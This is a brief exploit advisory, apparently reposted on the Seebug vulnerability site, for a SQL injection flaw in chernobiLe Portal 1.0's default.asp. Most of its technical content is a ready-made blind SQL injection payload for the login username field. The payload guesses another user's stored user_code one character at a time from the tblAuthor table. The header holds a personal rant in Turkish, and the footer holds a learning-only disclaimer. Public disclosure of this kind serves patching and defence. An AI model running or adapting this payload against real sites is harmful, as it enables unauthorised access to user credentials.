******************************************************************************* # Title : chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability # Author : ajann # Contact : :( # $$ : Not Free,Private # Info : /* Turk Script Eklememen konusunda guzelce uyarmistim,ukalaca tamam demistin Fakat hala birsey bulmus gibi bazi sitelerde bu raporlarin basligini aciyorsun.Urastigin konuda bari acik birakma.Havani atmaya dvm et. *\ ******************************************************************************* [[SQL]]] http://[target]/[path]//default.asp (POST Method) [SQL] Example: Method: One Char Brute Force Technique First,Please Register Before: User:[username]'/**/and/**/(substring((SELECT/**/user_code/**/FROM/**/tblAuthor/**/WHERE/**/username='targetuser'),1,1))='A'/* Pass:[userpass] If Login True Then First Character = A elSe Continue... [[/SQL]] """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker!
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论